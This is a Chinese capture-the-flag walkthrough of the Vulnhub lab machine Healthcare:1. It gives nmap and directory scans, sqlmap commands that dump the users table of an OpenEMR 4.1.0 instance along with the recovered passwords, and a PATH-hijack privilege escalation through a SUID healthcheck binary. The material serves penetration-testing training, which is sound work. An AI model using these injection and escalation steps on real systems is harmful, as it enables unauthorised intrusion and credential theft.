看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1

简介: 看完这篇 教你玩转渗透测试靶机Vulnhub——Healthcare:1

Vulnhub靶机介绍:

vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。

PS:需要获得root权限找到flag


Difficulty:Intermediate(中级的)

Vulnhub靶机下载:

官网链接:https://download.vulnhub.com/healthcare/Healthcare.ova


Vulnhub靶机安装:

下载好了把安装包解压 然后使用 VMware或者Oracle VM打开即可。


Vulnhub靶机漏洞详解:

①:信息收集:

kali里使用arp-scan -l或者netdiscover发现主机


渗透机:kali IP :192.168.0.103 靶机IP :192.168.0.109

使用命令:nmap -sS -sV -n -T4 -p- 192.168.0.109


开启了8021端口 访问80 使用工具:dirb,dirsearch,gobuster 扫到了robots.txt 进行访问没有可以利用的信息!


504b8fb634034f7cbc55671142656c26.png


2646cdb2bca84640958064e19372b398.png

这里换个字典directory-list-lowercase-2.3-big.txt(字典大有点慢)再扫一下发现一个新的目录 /openerm 进行访问


directory-list-lowercase-2.3-big.txt 字典下载:https://github.com/danielmiessler/SecLists



26f79af352954e1e825e81542eb4b619.png


②:漏洞发现SQL注入:

这里是OpenEMRCMS 这里可以看到版本号 使用本地漏洞库搜一下看看searchsploit openemr 4.1.0 发现这里有SQL注入漏洞



我这里没更新没搜到 49742.py 这里修改urlpython运行即可 跑出数据库密码的hashMD5破解即可。

你这里我们就使用sqlmap 来跑 也一样的 反正有两种方法都可以尝试!

③:SQL注入漏洞利用:
sqlmap -u http://192.168.0.109/openemr//interface/login/validateUser.php?u= --dbs  --batch #列出数据库


ac65428b78254e6cb82b28512d21197e.png



sqlmap -u http://192.168.0.109/openemr//interface/login/validateUser.php?u= -D openemr  --tables   --batch #列出表


875058b9ad10405fbaef5c7b5fd106fc.png


sqlmap -u http://192.168.0.109/openemr//interface/login/validateUser.php?u= -D openemr  -T users --columns  --batch #列出字段

629f01f38bab4cb1b7a5c5c876e2e1a6.png


sqlmap -u http://192.168.0.109/openemr//interface/login/validateUser.php?u= -D openemr -T users -C username,password --dump  --batch

d6eb044d41c24fea941d326474dfc106.png


得到两组账号密码: admin/ackbar medical/medical

④:反弹Shell:


获取第一个flag


⑤:环境变量提权:
find / -perm -u=s 2> /dev/null 
• 1



发现/usr/bin/healthcheck该文件会执行ifconfig 修改环境变量

echo "/bin/bash" > /tmp/ifconfig
chmod 777 /tmp/ifconfig
export PATH=/tmp:$PATH
/usr/bin/healthcheck


560a521129ee494faa06d931a0a32042.png

⑥:获取FLAG:

至此至此获取到了flag,本篇文章渗透结束 感谢大家的观看!!


Vulnhub靶机渗透总结:

1.信息收集dirb,dirsearch,gobuster,nikto 工具得使用

2.环境变量提权,这个靶机比较简单没啥新得知识点!

3.sqlmap工具的使用 searchsploit搜索利用反弹shell的使用


🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!

相关文章
|
27天前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
29 4
|
27天前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
31 4
|
27天前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
18 2
|
2月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
34 0
|
2月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
39 0
|
6月前
|
安全 Shell Linux
记录VulnHub 靶场——Escalate_Linux渗透测试过程
本文档描述了一次靶场环境的搭建和渗透测试过程。首先,提供了靶机环境的下载链接,并建议在VMware或VirtualBox中以NAT模式或仅主机模式导入。接着,通过Kali Linux扫描发现靶机IP,并用Nmap扫描开放端口,识别出80、111、139、445、2049等端口。在80端口上找到一个shell.php文件,通过它发现可以利用GET参数传递cmd命令。
144 0
|
6月前
|
安全 网络安全 数据安全/隐私保护
VulnHub 靶场--super-Mario-Host超级马里奥主机渗透测试过程
这篇文章描述了在一个网络安全靶场环境中进行渗透测试的过程。首先,从百度网盘下载并导入虚拟机镜像,然后将其网络设置为NAT或仅主机模式。接下来,通过扫描靶机IP地址的本地网络段,发现靶机IP为192.168.220.135,并且了解到靶机上有一个名为“mario.supermariohost.local”的Web服务,运行在8180端口。尝试SSH弱口令攻击失败后,通过信息收集找到一个名为“luigi.php”的页面,其中包含一段英文提示,提示需要将域名添加到hosts文件中。 通过cewl工具从luigi.php生成字典文件passwords,然后使用hydra工具尝试SSH登录,成功获得l
119 0
|
6月前
|
Shell Linux 网络安全
基于Vulnhub—DC8靶场渗透测试过程
这篇文章描述了一个渗透测试的过程。首先,作者下载了一个名为DC8的靶场环境并将其导入虚拟机软件,将网络设置为NAT或仅主机模式。然后进行了信息收集,通过ARP扫描发现靶机IP,并使用nmap扫描开放端口,发现80和22端口开放。进一步利用SQL注入漏洞,通过sqlmap工具获取了数据库中的用户名和密码
68 0
|
1月前
|
安全 网络安全
Kali渗透测试:使用Armitage扫描网络
Kali渗透测试:使用Armitage扫描网络
|
1月前
|
安全 Linux 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)